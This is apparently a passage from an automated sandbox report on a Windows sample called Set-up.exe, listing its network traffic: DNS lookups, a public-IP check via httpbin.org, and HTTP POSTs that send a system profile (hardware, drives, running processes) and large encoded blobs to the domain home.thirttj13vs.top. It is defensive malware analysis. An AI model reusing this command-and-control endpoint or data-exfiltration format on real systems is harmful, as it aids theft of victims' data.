Jan 7, 2025 14:38:16.577867031 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577876091 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577883959 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.577994108 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.578001976 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.578053951 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.578062057 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.578077078 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.578114033 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.578140020 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.578149080 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.578180075 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.578188896 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.578203917 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.578747988 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.578757048 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.578788042 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.578794956 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.578830957 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.578839064 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.583328962 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.583347082 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.583421946 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.583431005 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.583440065 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.583448887 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.583463907 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.583471060 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.583508015 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.583515882 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.583597898 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.583607912 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.583615065 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.583622932 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.583636999 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.583645105 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.583674908 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.583683968 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.583714962 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.583724022 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.584187031 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.584196091 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.584227085 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.584234953 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.584311962 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.584320068 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.584352016 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.584358931 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.584414959 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.584424019 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.584438086 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:19.094414949 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:19.094882011 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:19.099898100 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:19.101030111 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:19.703239918 CET	49721	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:19.707993984 CET	80	49721	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:19.708089113 CET	49721	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:19.708332062 CET	49721	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:19.713083982 CET	80	49721	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:20.363878965 CET	80	49721	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:20.364171982 CET	49721	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:20.369424105 CET	80	49721	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:20.369501114 CET	49721	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:20.377120972 CET	49724	53	192.168.2.5	1.1.1.1
Jan 7, 2025 14:38:20.381913900 CET	53	49724	1.1.1.1	192.168.2.5
Jan 7, 2025 14:38:20.382004023 CET	49724	53	192.168.2.5	1.1.1.1
Jan 7, 2025 14:38:20.382065058 CET	49724	53	192.168.2.5	1.1.1.1
Jan 7, 2025 14:38:20.386781931 CET	53	49724	1.1.1.1	192.168.2.5
Jan 7, 2025 14:38:21.353293896 CET	53	49724	1.1.1.1	192.168.2.5
Jan 7, 2025 14:38:21.354289055 CET	49724	53	192.168.2.5	1.1.1.1
Jan 7, 2025 14:38:21.354506016 CET	49733	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:21.359297037 CET	53	49724	1.1.1.1	192.168.2.5
Jan 7, 2025 14:38:21.359308004 CET	80	49733	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:21.359394073 CET	49724	53	192.168.2.5	1.1.1.1
Jan 7, 2025 14:38:21.359411001 CET	49733	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:21.359623909 CET	49733	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:21.364391088 CET	80	49733	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:22.070503950 CET	80	49733	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:22.070792913 CET	49733	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:22.076997042 CET	80	49733	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:22.077061892 CET	49733	80	192.168.2.5	34.147.147.173

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 14:38:00.979012966 CET	62851	53	192.168.2.5	1.1.1.1
Jan 7, 2025 14:38:00.979087114 CET	62851	53	192.168.2.5	1.1.1.1
Jan 7, 2025 14:38:00.985661983 CET	53	62851	1.1.1.1	192.168.2.5
Jan 7, 2025 14:38:00.985723972 CET	53	62851	1.1.1.1	192.168.2.5
Jan 7, 2025 14:38:15.403714895 CET	62856	53	192.168.2.5	1.1.1.1
Jan 7, 2025 14:38:15.403783083 CET	62856	53	192.168.2.5	1.1.1.1
Jan 7, 2025 14:38:16.071479082 CET	53	62856	1.1.1.1	192.168.2.5
Jan 7, 2025 14:38:16.071492910 CET	53	62856	1.1.1.1	192.168.2.5
Jan 7, 2025 14:38:19.101768017 CET	58832	53	192.168.2.5	1.1.1.1
Jan 7, 2025 14:38:19.101814032 CET	58832	53	192.168.2.5	1.1.1.1
Jan 7, 2025 14:38:19.574959993 CET	53	58832	1.1.1.1	192.168.2.5
Jan 7, 2025 14:38:19.702364922 CET	53	58832	1.1.1.1	192.168.2.5
Jan 7, 2025 14:38:20.370320082 CET	58834	53	192.168.2.5	1.1.1.1
Jan 7, 2025 14:38:20.370366096 CET	58834	53	192.168.2.5	1.1.1.1
Jan 7, 2025 14:38:20.376842976 CET	53	58834	1.1.1.1	192.168.2.5
Jan 7, 2025 14:38:21.283931971 CET	53	58834	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 7, 2025 14:38:00.979012966 CET	192.168.2.5	1.1.1.1	0xca	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Jan 7, 2025 14:38:00.979087114 CET	192.168.2.5	1.1.1.1	0xb31d	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Jan 7, 2025 14:38:15.403714895 CET	192.168.2.5	1.1.1.1	0x740c	Standard query (0)	home.thirttj13vs.top	A (IP address)	IN (0x0001)	false
Jan 7, 2025 14:38:15.403783083 CET	192.168.2.5	1.1.1.1	0x2dfc	Standard query (0)	home.thirttj13vs.top	28	IN (0x0001)	false
Jan 7, 2025 14:38:19.101768017 CET	192.168.2.5	1.1.1.1	0xd0b1	Standard query (0)	home.thirttj13vs.top	A (IP address)	IN (0x0001)	false
Jan 7, 2025 14:38:19.101814032 CET	192.168.2.5	1.1.1.1	0x9c19	Standard query (0)	home.thirttj13vs.top	28	IN (0x0001)	false
Jan 7, 2025 14:38:20.370320082 CET	192.168.2.5	1.1.1.1	0x8377	Standard query (0)	home.thirttj13vs.top	A (IP address)	IN (0x0001)	false
Jan 7, 2025 14:38:20.370366096 CET	192.168.2.5	1.1.1.1	0xf5b9	Standard query (0)	home.thirttj13vs.top	28	IN (0x0001)	false
Jan 7, 2025 14:38:20.382065058 CET	192.168.2.5	1.1.1.1	0x8377	Standard query (0)	home.thirttj13vs.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 7, 2025 14:38:00.985723972 CET	1.1.1.1	192.168.2.5	0xca	No error (0)	httpbin.org	50.19.58.113	A (IP address)	IN (0x0001)	false
Jan 7, 2025 14:38:00.985723972 CET	1.1.1.1	192.168.2.5	0xca	No error (0)	httpbin.org	34.197.122.172	A (IP address)	IN (0x0001)	false
Jan 7, 2025 14:38:00.985723972 CET	1.1.1.1	192.168.2.5	0xca	No error (0)	httpbin.org	34.200.57.114	A (IP address)	IN (0x0001)	false
Jan 7, 2025 14:38:00.985723972 CET	1.1.1.1	192.168.2.5	0xca	No error (0)	httpbin.org	3.210.94.60	A (IP address)	IN (0x0001)	false
Jan 7, 2025 14:38:16.071479082 CET	1.1.1.1	192.168.2.5	0x740c	No error (0)	home.thirttj13vs.top	34.147.147.173	A (IP address)	IN (0x0001)	false
Jan 7, 2025 14:38:19.702364922 CET	1.1.1.1	192.168.2.5	0xd0b1	No error (0)	home.thirttj13vs.top	34.147.147.173	A (IP address)	IN (0x0001)	false
Jan 7, 2025 14:38:21.353293896 CET	1.1.1.1	192.168.2.5	0x8377	No error (0)	home.thirttj13vs.top	34.147.147.173	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

httpbin.org

home.thirttj13vs.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	34.147.147.173	80	4764	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 14:38:16.080607891 CET	12360	OUT	POST /jhkNTMUXVuSQJmAfrHzR1736163221 HTTP/1.1 Host: home.thirttj13vs.top Accept: / Content-Type: application/json Content-Length: 562088 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 38 34 33 32 33 31 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "8428488241958432312", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe" [TRUNCATED]
Jan 7, 2025 14:38:16.086291075 CET	9888	OUT	Data Raw: 59 44 74 62 65 44 62 39 56 50 42 6a 62 70 2b 65 63 51 65 4a 76 42 65 51 54 72 55 4d 62 6e 46 50 46 59 36 68 55 6e 53 71 35 66 6c 6b 58 6a 38 58 54 72 30 6d 34 31 4d 50 58 39 68 66 44 59 4f 76 43 7a 35 36 65 4f 78 47 47 6b 74 45 5c 2f 65 6c 46 50 Data Ascii: YDtbeDb9VPBjbp+ecQeJvBeQTrUMbnFPFY6hUnSq5flkXj8XTr0m41MPX9hfDYOvCz56eOxGGktE\/elFP9N4Z8H\/EDiunh8VgMhrYPLsTTp16OaZxKOV4Krhq0YypYrDLE2xePw1WMounWy7C4yE03KLcYzlH5LH\/AC0\/H+tR1+ilj8GvhB4l0VRc+CJdAmeRmGo+EvFPiSDUEZSNse3xbf8AjPS5Lbg+ZH\/Zcdy4JCXsJ
Jan 7, 2025 14:38:16.086354017 CET	7416	OUT	Data Raw: 42 7a 34 31 2b 47 72 44 78 58 34 57 38 49 5c 2f 46 48 34 4d 76 34 43 38 53 2b 4d 66 69 6a 34 72 47 67 65 50 5c 2f 32 66 66 46 6e 6a 58 56 46 69 2b 4c 48 6a 76 78 54 38 51 50 45 57 68 36 7a 71 75 6d 66 74 45 2b 44 64 47 31 33 54 34 74 55 38 58 36 Data Ascii: Bz41+GrDxX4W8I\/FH4Mv4C8S+Mfij4rGgeP\/2ffFnjXVFi+LHjvxT8QPEWh6zqumftE+DdG13T4tU8X6rptqB4T01ZNFS1tb6G7uFuby6\/ls\/4KC\/szW37LXx3t\/B9nruha1beNPB1n8Sorbwz4T1bwb4e8NrrnifxZof\/AAjWjaTrnjn4ias2n2B8Mm5tri+8TXMwivlsxGqWaSzfr7cftreEIfAfwf1x\/wDgqP5UX
Jan 7, 2025 14:38:16.086741924 CET	6180	OUT	Data Raw: 78 47 45 63 61 65 48 67 38 56 52 78 46 4f 4f 49 54 64 61 4a 2b 61 76 37 46 50 78 4d 2b 4a 76 78 47 38 46 5c 2f 47 49 65 4a 64 49 30 6a 54 5c 2f 68 31 6f 4e 36 6c 6a 38 4f 50 37 47 30 58 53 50 44 39 6e 70 67 6d 54 56 62 33 56 5c 2f 44 73 56 6a 70 Data Ascii: xGEcaeHg8VRxFOOITdaJ+av7FPxM+JvxG8F\/GIeJdI0jT\/h1oN6lj8OP7G0XSPD9npgmTVb3V\/DsVjpFjZwXDWNrcaLd3M7DMFzfOqtKlwq2+1X6Y+JdH0pPDetxxafaW6tZXsp+zQR2xMsiM0khMCxlnkYlnZsl2JLZJr8\/J9BTBa3nKYydswyv\/AH8UAqB7oxx1Pr\/J2e+J2QcV53jM0oZOuF6GJnT9nl9J\/WcNR5K
Jan 7, 2025 14:38:16.091630936 CET	2472	OUT	Data Raw: 65 47 4d 4a 38 37 5c 2f 77 41 66 5c 2f 4c 58 5c 2f 41 44 5c 2f 6e 39 61 43 71 58 54 5c 2f 44 5c 2f 6b 51 2b 58 5c 2f 30 78 71 4b 54 38 2b 50 4e 5c 2f 31 76 57 70 5a 44 5c 2f 73 62 50 38 41 72 70 4c 2b 76 54 5c 2f 4f 4f 6c 4d 5c 2f 75 4a 74 6a 35 Data Ascii: eGMJ87\/wAf\/LX\/AD\/n9aCqXT\/D\/kQ+X\/0xqKT8+PN\/1vWpZD\/sbP8ArpL+vT\/OOlM\/uJtj569vJ+lB3EMmz5H+4+f+evH+R27fhTPn++ib\/wDp3\/Afmf6cU4fcj\/8Aan\/Hx\/n1pp+87874\/wB15n+cnk\/SgPa\/3vw\/4BBt8tt\/\/bKKP\/P+e\/pUXlpH+5dP\/wBXf+g\/wq1JJ99B8\/ceZL+44\
Jan 7, 2025 14:38:16.091742992 CET	6180	OUT	Data Raw: 38 33 7a 5c 2f 41 50 50 54 38 4b 66 4a 5c 2f 72 45 38 6e 5c 2f 6e 6c 62 79 5c 2f 61 50 4e 78 2b 76 5c 2f 31 36 68 6b 32 66 4d 37 70 35 50 37 33 79 76 33 6e 2b 65 5c 2f 31 7a 78 57 5a 6f 4d 33 65 58 76 63 49 4e 5c 2f 6d 6a 39 33 5c 2f 7a 32 2b 6e Data Ascii: 83z\/APPT8KfJ\/rE8n\/nlby\/aPNx+v\/16hk2fM7p5P73yv3n+e\/1zxWZoM3eXvcIN\/mj93\/z2+n8v88m15PnTzN\/Mn+tP773tLQU9cqyIj73\/ANb5kkv+ecZqItz9\/ZCZf3v\/ADwzn\/PT8vTT2fn+H\/BOg\/d2isTxJr1n4Y0PUtf1A4stLtzc3B3BcRh1T7xBA5cc4Ndt8U9I0b4V3HxEtJfiv8G\/iHe\/Br
Jan 7, 2025 14:38:16.135320902 CET	27192	OUT	Data Raw: 68 4a 5c 2f 68 70 4e 70 48 78 48 76 39 55 68 38 4a 57 39 78 70 5c 2f 68 58 78 4e 34 56 4e 78 59 4c 72 58 69 54 52 74 48 76 50 34 75 38 51 50 43 6a 36 4a 5c 2f 69 31 78 72 6e 58 48 6d 5a 63 5a 5a 33 6c 33 45 32 63 7a 79 5c 2f 42 5a 2b 2b 46 2b 4a Data Ascii: hJ\/hpNpHxHv9Uh8JW9xp\/hXxN4VNxYLrXiTRtHvP4u8QPCj6J\/i1xrnXHmZcZZ3l3E2czy\/BZ++F+Js6ymjm+PyhZdwrl+LxGVywWIpVcwVGOU8P0sVgaNNY6GAoYZLEVsDiJQ\/wBOPCH6Uf06fAfwn4Q8IMJ4U+HPGPAfBFPO8ZwNPxL8NOGeKcx4TyPinG5t4hZxkmX8S0cyy7G0+H55tmXEHGlTK82xeKWU4viXG4+L
Jan 7, 2025 14:38:16.187180042 CET	13596	OUT	Data Raw: 32 7a 5c 2f 4b 73 77 6c 68 35 32 62 70 7a 78 4f 58 34 61 63 31 61 53 68 79 74 4e 5c 2f 37 4e 63 4b 66 36 4f 64 39 4c 54 69 58 68 33 4a 38 2b 7a 44 6a 37 77 66 34 4c 78 6d 61 34 47 68 6a 61 5c 2f 43 5c 2f 46 58 45 48 46 48 2b 73 57 53 79 72 77 6a Data Ascii: 2z\/Kswlh52bpzxOX4ac1aShytN\/7NcKf6Od9LTiXh3J8+zDj7wf4Lxma4Ghja\/C\/FXEHFH+sWSyrwjU+o5uuGuBeJMkhjqSlavSwGd5hSpTvTdbnjJR\/VZ\/DfiLH\/ACANa6\/9Aq+9D\/0woPhvxF\/0BNa\/DS77+kA\/lX5U\/wDDwX9sX\/ouOv8A\/gk8H\/8AzOUf8PBf2xf+i46\/\/wCCTwf\/APM5Xl\/8VX
Jan 7, 2025 14:38:16.235168934 CET	1236	OUT	Data Raw: 35 5c 2f 6f 68 74 52 79 64 76 78 5c 2f 70 55 6c 52 79 64 76 78 5c 2f 70 51 57 52 30 6a 41 74 2b 65 61 54 35 5c 2f 39 6e 39 61 50 6e 5c 2f 32 66 31 6f 4f 67 62 35 66 76 2b 6e 5c 2f 31 36 67 38 76 35 73 64 73 39 50 66 30 5c 2f 77 44 72 5c 2f 77 44 Data Ascii: 5\/ohtRydvx\/pUlRydvx\/pQWR0jAt+eaT5\/9n9aPn\/2f1oOgb5fv+n\/16g8v5sds9Pf0\/wDr\/wD66t1XkXsPqP8ACguG\/wAv1RXo27uMVJ5fv+n\/ANejy\/f9P\/r0HRzvy\/r5lfy\/f9P\/AK9R1c8v3\/T\/AOvUPlezfl\/9atPaeX4\/8A1IaZsHv\/n8Kt1H5fv+n\/16r2vnL+vmaU6m2vz\/AEf9dinJH0
Jan 7, 2025 14:38:16.283278942 CET	1236	OUT	Data Raw: 64 76 38 5c 2f 35 5c 2f 72 6d 66 5a 2b 66 34 66 38 45 37 50 61 65 58 34 5c 2f 77 44 41 49 70 4e 6e 7a 5c 2f 36 76 32 5c 2f 38 41 72 65 5c 2f 31 37 31 56 5c 2f 31 5a 33 37 49 33 5c 2f 36 61 66 38 41 4c 41 5c 2f 35 5c 2f 77 41 50 77 75 48 5a 5c 2f Data Ascii: dv8\/5\/rmfZ+f4f8E7PaeX4\/wDAIpNnz\/6v2\/8Are\/171V\/1Z37I3\/6af8ALA\/5\/wAPwuHZ\/f3vJ\/y0j\/6+sf8A6vfp1pjRpHv3x7Mn\/WSY5\/8Ar+lHs\/P8P+CaUvs\/P9ShJI7Kf7gx5X8\/880TfvPOR0\/66+Xz\/X68+tPkP3NnmeT\/AMsvL\/1GO\/8An8qZIvltNl\/k\/wBaP8f8+w6GtDsp9fl+
Jan 7, 2025 14:38:16.331276894 CET	1236	OUT	Data Raw: 31 4c 2b 50 72 31 5c 2f 79 63 55 5c 2f 35 31 6a 54 2b 50 39 31 2b 76 47 66 38 41 50 53 6e 5c 2f 41 43 4e 39 39 70 45 7a 2b 36 2b 54 39 5c 2f 37 66 34 66 34 30 47 78 57 5c 2f 31 6d 2b 54 4f 5c 2f 7a 50 33 55 76 37 33 79 50 50 36 5a 5c 2f 7a 2b 4e Data Ascii: 1L+Pr1\/ycU\/51jT+P91+vGf8APSn\/ACN99pEz+6+T9\/7f4f40GxW\/1m+TO\/zP3Uv73yPP6Z\/z+NMkj\/jdC6f8tc\/56ipmjh2p8kqfvf3Ukkv7+H\/63+R3p\/8Aq13\/AOkb\/wDlrv8AtXkf4f8A180AV5P+2kycSSx+V5EH5VHuh\/uR7PNxn8fXP6VNJ80juid\/K\/1v7j\/Dv6\/hTGZPk3\/Z9kn2fp9O93\
Jan 7, 2025 14:38:19.094414949 CET	138	IN	HTTP/1.1 200 OK server: nginx/1.22.1 date: Tue, 07 Jan 2025 13:38:18 GMT content-type: text/html; charset=utf-8 content-length: 1 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49721	34.147.147.173	80	4764	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 14:38:19.708332062 CET	100	OUT	GET /jhkNTMUXVuSQJmAfrHzR1736163221?argument=0 HTTP/1.1 Host: home.thirttj13vs.top Accept: /
Jan 7, 2025 14:38:20.363878965 CET	353	IN	HTTP/1.1 404 NOT FOUND server: nginx/1.22.1 date: Tue, 07 Jan 2025 13:38:20 GMT content-type: text/html; charset=utf-8 content-length: 207 Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49733	34.147.147.173	80	4764	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 14:38:21.359623909 CET	173	OUT	POST /jhkNTMUXVuSQJmAfrHzR1736163221 HTTP/1.1 Host: home.thirttj13vs.top Accept: / Content-Type: application/json Content-Length: 31 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Jan 7, 2025 14:38:22.070503950 CET	353	IN	HTTP/1.1 404 NOT FOUND server: nginx/1.22.1 date: Tue, 07 Jan 2025 13:38:21 GMT content-type: text/html; charset=utf-8 content-length: 207 Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	50.19.58.113	443	4764	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 13:38:01 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2025-01-07 13:38:01 UTC	224	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 13:38:01 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2025-01-07 13:38:01 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Target ID:	0
Start time:	08:37:59
Start date:	07/01/2025
Path:	C:\Users\user\Desktop\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Set-up.exe"
Imagebase:	0xc80000
File size:	7'343'240 bytes
MD5 hash:	E52DA29CA9214E322BA939105A9D6BB8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	30.8%
Total number of Nodes:	1603
Total number of Limit Nodes:	74

Executed Functions

Function 00CBA550 Relevance: 67.3, APIs: 23, Strings: 15, Instructions: 777networkstringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C9D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,00C901B1), ref: 00C9D8E2

setsockopt.WS2_32(?,00000029,0000001B,00000000,00000004), ref: 00CBA670
